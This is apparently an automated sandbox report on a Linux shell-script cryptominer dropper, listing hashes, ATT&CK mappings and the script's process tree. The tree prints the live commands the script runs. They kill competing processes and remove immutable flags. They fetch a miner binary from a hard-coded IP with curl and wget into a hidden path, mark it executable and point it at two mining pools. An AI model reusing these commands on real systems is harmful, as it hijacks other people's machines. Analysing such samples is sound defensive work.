eb5863ec076f38f68a8db2fceb316d07f621e87ba72bfca085a243a651686866

Analysis

max time kernel
139s
max time network
144s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
27/03/2025, 15:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Size

5KB
MD5

7b72cf30ac42c20f0a14b0b87425c00a
SHA1

74402152ac0f0c9dfed6f76975080ce1d0d4584d
SHA256

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
SHA512

1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
SSDEEP

96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8

Score

7^/10

defense_evasion discovery persistence

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
921	chmod
975	chmod
1090	chmod
769	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/.cache/.kswapd	922	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/.cache/.kswapd	1091	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Attempts to change immutable files 37 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
874	grep
1015	grep
1075	grep
818	grep
895	grep
1027	grep
1051	grep
1067	grep
1071	grep
826	grep
830	grep
838	grep
846	grep
974	chattr
1039	grep
1055	grep
768	chattr
822	grep
878	grep
854	grep
858	grep
866	grep
1035	grep
1043	grep
1059	grep
814	grep
834	grep
842	grep
1031	grep
870	grep
1019	grep
1023	grep
1047	grep
1063	grep
810	grep
850	grep
862	grep

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 1 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/local/bin/.clB1sa5None	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Reads CPU attributes 1 TTPs 6 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Process Discovery 1 TTPs 6 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
747	ps
757	ps
771	ps
790	ps
977	ps
995	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/695/stat	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/69/cmdline	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/328/stat	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/71/stat	ps
File opened for reading	/proc/239/cmdline	ps
File opened for reading	/proc/789/cmdline	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/105/stat	ps
File opened for reading	/proc/789/stat	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/991/cmdline	ps
File opened for reading	/proc/82/stat	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/37/status	ps
File opened for reading	/proc/992/stat	ps
File opened for reading	/proc/1008/stat	ps
File opened for reading	/proc/486/cmdline	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/115/status	ps
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/105/stat	ps
File opened for reading	/proc/491/cmdline	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/73/status	ps
File opened for reading	/proc/36/status	ps
File opened for reading	/proc/77/status	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/1000/stat	ps
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/486/status	ps
File opened for reading	/proc/758/stat	ps
File opened for reading	/proc/72/stat	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/105/cmdline	ps
File opened for reading	/proc/330/status	ps
File opened for reading	/proc/764/cmdline	ps
File opened for reading	/proc/74/status	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/778/cmdline	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/689/stat	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/486/stat	ps
File opened for reading	/proc/9/stat	ps
File opened for reading	/proc/491/status	ps
File opened for reading	/proc/776/status	ps
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/993/stat	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/386/status	ps
File opened for reading	/proc/37/status	ps
File opened for reading	/proc/797/status	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/376/stat	ps
File opened for reading	/proc/674/stat	ps

Writes file to shm directory 1 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

description	ioc	Process
File opened for modification	/dev/shm/.clB1sa5None	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.clB1sa5None	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
1⤵
- Executes dropped EXE
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:697
- /bin/uname
  uname -a
  2⤵
  PID:705
- /bin/rm
  rm --help
  2⤵
  PID:709
- /bin/grep
  grep " rm does not remove dir"
  2⤵
  PID:710
- /usr/bin/wc
  wc -l
  2⤵
  PID:711
- /usr/bin/wc
  wc -l
  2⤵
  PID:717
- /usr/bin/curl
  curl --help
  2⤵
  PID:715
- /bin/grep
  grep -i "Dump libcurl equivalent"
  2⤵
  PID:716
- /bin/grep
  grep -i "wgetrc "
  2⤵
  PID:726
- /usr/bin/wc
  wc -l
  2⤵
  PID:727
- /usr/bin/wget
  wget --version
  2⤵
  PID:725
- /usr/bin/tr
  tr -dc A-Za-z0-9
  2⤵
  PID:732
- /usr/bin/head
  head /dev/urandom
  2⤵
  PID:731
- /usr/bin/shuf
  shuf -i 4-16 -n 1
  2⤵
  PID:735
- /usr/bin/head
  head -c 11
  2⤵
  PID:733
- /bin/rm
  rm -f /tmp/.clB1sa5None
  2⤵
  PID:740
- /bin/rm
  rm -f /tmp/.clB1sa5None
  2⤵
  PID:741
- /bin/rm
  rm -f /usr/local/bin/.clB1sa5None
  2⤵
  PID:743
- /bin/rm
  rm -f /dev/shm/.clB1sa5None
  2⤵
  PID:744
- /bin/rm
  rm -f /.clB1sa5None
  2⤵
  PID:745
- /bin/grep
  grep -v grep
  2⤵
  PID:748
- /bin/grep
  grep -v defunct
  2⤵
  PID:749
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:747
- /bin/grep
  grep -v "sh "
  2⤵
  PID:750
- /bin/grep
  grep " sleep 120"
  2⤵
  PID:751
- /usr/bin/wc
  wc -l
  2⤵
  PID:752
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:757
- /bin/grep
  grep -v "sh "
  2⤵
  PID:759
- /bin/grep
  grep -v grep
  2⤵
  PID:758
- /bin/grep
  grep -v defunct
  2⤵
  PID:760
- /bin/grep
  grep " sleep 120"
  2⤵
  PID:761
- /usr/bin/wc
  wc -l
  2⤵
  PID:762
- /bin/sleep
  sleep 120
  2⤵
  PID:766
- /bin/mkdir
  mkdir -p /.cache/
  2⤵
  PID:767
- /usr/bin/chattr
  chattr -i /.cache/
  2⤵
  - Attempts to change immutable files
  PID:768
- /bin/chmod
  chmod 1755 /.cache/
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /bin/grep
  grep -v l0
  2⤵
  PID:772
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:771
- /bin/grep
  grep -v eth1
  2⤵
  PID:773
- /bin/grep
  grep -v lan0
  2⤵
  PID:774
- /bin/grep
  grep -v "^-"
  2⤵
  PID:775
- /bin/grep
  grep -v eth0
  2⤵
  PID:776
- /bin/grep
  grep -v inet0
  2⤵
  PID:777
- /bin/grep
  grep -v lano
  2⤵
  PID:778
- /bin/grep
  grep -v grep
  2⤵
  PID:779
- /bin/grep
  grep -v defunct
  2⤵
  PID:780
- /bin/grep
  grep -v knthread
  2⤵
  PID:781
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:782
- /bin/grep
  grep -vi "java "
  2⤵
  PID:783
- /bin/grep
  grep -vi jenkins
  2⤵
  PID:784
- /bin/grep
  grep -vi exim
  2⤵
  PID:785
- /usr/bin/head
  head -n 1
  2⤵
  PID:787
- /usr/bin/awk
  awk "{if(\$3>=54.0) print \$11}"
  2⤵
  PID:786
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:790
- /bin/grep
  grep -v l0
  2⤵
  PID:791
- /bin/grep
  grep -v eth1
  2⤵
  PID:792
- /bin/grep
  grep -v lan0
  2⤵
  PID:793
- /bin/grep
  grep -v "^-"
  2⤵
  PID:794
- /bin/grep
  grep -v eth0
  2⤵
  PID:795
- /bin/grep
  grep -v inet0
  2⤵
  PID:796
- /bin/grep
  grep -v lano
  2⤵
  PID:797
- /bin/grep
  grep -v grep
  2⤵
  PID:798
- /bin/grep
  grep -v defunct
  2⤵
  PID:799
- /bin/grep
  grep -v python
  2⤵
  PID:800
- /bin/grep
  grep -v knthread
  2⤵
  PID:801
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:802
- /bin/grep
  grep -vi bash
  2⤵
  PID:803
- /bin/grep
  grep -vi exim
  2⤵
  PID:804
- /usr/bin/awk
  awk "{if(\$3>=0.0) print \$2}"
  2⤵
  PID:805
- /usr/bin/uniq
  uniq
  2⤵
  PID:806
- /bin/readlink
  readlink /proc/323/exe
  2⤵
  PID:808
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe
  2⤵
  - Attempts to change immutable files
  PID:810
- /bin/readlink
  readlink /proc/326/exe
  2⤵
  PID:812
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe
  2⤵
  - Attempts to change immutable files
  PID:814
- /bin/readlink
  readlink /proc/328/exe
  2⤵
  PID:816
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe
  2⤵
  - Attempts to change immutable files
  PID:818
- /bin/readlink
  readlink /proc/330/exe
  2⤵
  PID:820
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe
  2⤵
  - Attempts to change immutable files
  PID:822
- /bin/readlink
  readlink /proc/334/exe
  2⤵
  PID:824
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/334/exe
  2⤵
  - Attempts to change immutable files
  PID:826
- /bin/readlink
  readlink /proc/374/exe
  2⤵
  PID:828
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe
  2⤵
  - Attempts to change immutable files
  PID:830
- /bin/readlink
  readlink /proc/376/exe
  2⤵
  PID:832
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/376/exe
  2⤵
  - Attempts to change immutable files
  PID:834
- /bin/readlink
  readlink /proc/386/exe
  2⤵
  PID:836
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/386/exe
  2⤵
  - Attempts to change immutable files
  PID:838
- /bin/readlink
  readlink /proc/390/exe
  2⤵
  PID:840
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/390/exe
  2⤵
  - Attempts to change immutable files
  PID:842
- /bin/readlink
  readlink /proc/486/exe
  2⤵
  PID:844
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/486/exe
  2⤵
  - Attempts to change immutable files
  PID:846
- /bin/readlink
  readlink /proc/491/exe
  2⤵
  PID:848
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/491/exe
  2⤵
  - Attempts to change immutable files
  PID:850
- /bin/readlink
  readlink /proc/688/exe
  2⤵
  PID:852
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/688/exe
  2⤵
  - Attempts to change immutable files
  PID:854
- /bin/readlink
  readlink /proc/689/exe
  2⤵
  PID:856
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/689/exe
  2⤵
  - Attempts to change immutable files
  PID:858
- /bin/readlink
  readlink /proc/693/cwd
  2⤵
  PID:859
- /bin/cat
  cat /proc/693/comm
  2⤵
  PID:860
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  2⤵
  - Attempts to change immutable files
  PID:862
- /bin/readlink
  readlink /proc/694/cwd
  2⤵
  PID:863
- /bin/cat
  cat /proc/694/comm
  2⤵
  PID:864
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  2⤵
  - Attempts to change immutable files
  PID:866
- /bin/readlink
  readlink /proc/695/cwd
  2⤵
  PID:867
- /bin/cat
  cat /proc/695/comm
  2⤵
  PID:868
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  2⤵
  - Attempts to change immutable files
  PID:870
- /bin/readlink
  readlink /proc/699/exe
  2⤵
  PID:872
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe
  2⤵
  - Attempts to change immutable files
  PID:874
- /bin/readlink
  readlink /proc/700/exe
  2⤵
  PID:876
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/700/exe
  2⤵
  - Attempts to change immutable files
  PID:878
- /bin/readlink
  readlink /proc/766/exe
  2⤵
  PID:893
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/766/exe
  2⤵
  - Attempts to change immutable files
  PID:895
- /bin/grep
  grep x86_64
  2⤵
  PID:902
- /usr/bin/wc
  wc -l
  2⤵
  PID:903
- /usr/bin/curl
  curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
  2⤵
  PID:905
- /usr/bin/wget
  wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
  2⤵
  PID:910
- /bin/chmod
  chmod +x /.cache/.kswapd
  2⤵
  - File and Directory Permissions Modification
  PID:921
- /bin/sleep
  sleep 120
  2⤵
  PID:972
- /bin/mkdir
  mkdir -p /.cache/
  2⤵
  PID:973
- /usr/bin/chattr
  chattr -i /.cache/
  2⤵
  - Attempts to change immutable files
  PID:974
- /bin/chmod
  chmod 1755 /.cache/
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /bin/grep
  grep -v eth1
  2⤵
  PID:979
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:977
- /bin/grep
  grep -v l0
  2⤵
  PID:978
- /bin/grep
  grep -v "^-"
  2⤵
  PID:981
- /bin/grep
  grep -v lan0
  2⤵
  PID:980
- /bin/grep
  grep -v eth0
  2⤵
  PID:982
- /bin/grep
  grep -v inet0
  2⤵
  PID:983
- /bin/grep
  grep -v lano
  2⤵
  PID:984
- /bin/grep
  grep -v grep
  2⤵
  PID:985
- /bin/grep
  grep -v defunct
  2⤵
  PID:986
- /bin/grep
  grep -v knthread
  2⤵
  PID:987
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:988
- /bin/grep
  grep -vi "java "
  2⤵
  PID:989
- /bin/grep
  grep -vi jenkins
  2⤵
  PID:990
- /bin/grep
  grep -vi exim
  2⤵
  PID:991
- /usr/bin/head
  head -n 1
  2⤵
  PID:993
- /usr/bin/awk
  awk "{if(\$3>=54.0) print \$11}"
  2⤵
  PID:992
- /bin/grep
  grep -v eth1
  2⤵
  PID:997
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:995
- /bin/grep
  grep -v l0
  2⤵
  PID:996
- /bin/grep
  grep -v lan0
  2⤵
  PID:998
- /bin/grep
  grep -v "^-"
  2⤵
  PID:999
- /bin/grep
  grep -v eth0
  2⤵
  PID:1000
- /bin/grep
  grep -v inet0
  2⤵
  PID:1001
- /bin/grep
  grep -v lano
  2⤵
  PID:1002
- /bin/grep
  grep -v grep
  2⤵
  PID:1003
- /bin/grep
  grep -v defunct
  2⤵
  PID:1004
- /bin/grep
  grep -v python
  2⤵
  PID:1005
- /bin/grep
  grep -v knthread
  2⤵
  PID:1006
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:1007
- /bin/grep
  grep -vi bash
  2⤵
  PID:1008
- /bin/grep
  grep -vi exim
  2⤵
  PID:1009
- /usr/bin/awk
  awk "{if(\$3>=0.0) print \$2}"
  2⤵
  PID:1010
- /usr/bin/uniq
  uniq
  2⤵
  PID:1011
- /bin/readlink
  readlink /proc/323/exe
  2⤵
  PID:1013
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe
  2⤵
  - Attempts to change immutable files
  PID:1015
- /bin/readlink
  readlink /proc/326/exe
  2⤵
  PID:1017
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe
  2⤵
  - Attempts to change immutable files
  PID:1019
- /bin/readlink
  readlink /proc/328/exe
  2⤵
  PID:1021
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe
  2⤵
  - Attempts to change immutable files
  PID:1023
- /bin/readlink
  readlink /proc/330/exe
  2⤵
  PID:1025
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/330/exe
  2⤵
  - Attempts to change immutable files
  PID:1027
- /bin/readlink
  readlink /proc/334/exe
  2⤵
  PID:1029
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/334/exe
  2⤵
  - Attempts to change immutable files
  PID:1031
- /bin/readlink
  readlink /proc/374/exe
  2⤵
  PID:1033
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe
  2⤵
  - Attempts to change immutable files
  PID:1035
- /bin/readlink
  readlink /proc/376/exe
  2⤵
  PID:1037
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/376/exe
  2⤵
  - Attempts to change immutable files
  PID:1039
- /bin/readlink
  readlink /proc/386/exe
  2⤵
  PID:1041
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/386/exe
  2⤵
  - Attempts to change immutable files
  PID:1043
- /bin/readlink
  readlink /proc/390/exe
  2⤵
  PID:1045
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/390/exe
  2⤵
  - Attempts to change immutable files
  PID:1047
- /bin/readlink
  readlink /proc/486/exe
  2⤵
  PID:1049
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/486/exe
  2⤵
  - Attempts to change immutable files
  PID:1051
- /bin/readlink
  readlink /proc/491/exe
  2⤵
  PID:1053
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/491/exe
  2⤵
  - Attempts to change immutable files
  PID:1055
- /bin/readlink
  readlink /proc/693/cwd
  2⤵
  PID:1056
- /bin/cat
  cat /proc/693/comm
  2⤵
  PID:1057
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  2⤵
  - Attempts to change immutable files
  PID:1059
- /bin/readlink
  readlink /proc/694/cwd
  2⤵
  PID:1060
- /bin/cat
  cat /proc/694/comm
  2⤵
  PID:1061
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  2⤵
  - Attempts to change immutable files
  PID:1063
- /bin/readlink
  readlink /proc/695/cwd
  2⤵
  PID:1064
- /bin/cat
  cat /proc/695/comm
  2⤵
  PID:1065
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  2⤵
  - Attempts to change immutable files
  PID:1067
- /bin/readlink
  readlink /proc/700/exe
  2⤵
  PID:1069
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/700/exe
  2⤵
  - Attempts to change immutable files
  PID:1071
- /bin/readlink
  readlink /proc/972/exe
  2⤵
  PID:1073
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/972/exe
  2⤵
  - Attempts to change immutable files
  PID:1075
- /usr/bin/cut
  cut -c 1-32
  2⤵
  PID:1079
- /usr/bin/md5sum
  md5sum /.cache/.kswapd
  2⤵
  PID:1078
- /usr/bin/md5sum
  md5sum /.cache/.kswapd
  2⤵
  PID:1081
- /usr/bin/cut
  cut -c 1-32
  2⤵
  PID:1082
- /bin/grep
  grep x86_64
  2⤵
  PID:1085
- /usr/bin/wc
  wc -l
  2⤵
  PID:1086
- /usr/bin/curl
  curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
  2⤵
  PID:1088
- /usr/bin/wget
  wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
  2⤵
  PID:1089
- /bin/chmod
  chmod +x /.cache/.kswapd
  2⤵
  - File and Directory Permissions Modification
  PID:1090

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
PID:922

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
PID:1091

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.clB1sa5None

Filesize
12B

MD5
25746727d2b688a4595b743a7098c13c

SHA1
00e95881126ae85bbc0e2565a4b23f52b3436de2

SHA256
b39d5862ae56e24a9831d3a31de1839276368d1b3921c965ba66beacfa20f2ba

SHA512
4c3d89b888bb2561a2332c84cc913bfd0f3aa67f9b0e8ff58bb8bba912b3571257c56484059b0be077f6454c4bd348f8eef2f719db2c613cfdba898a4ba58be7

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads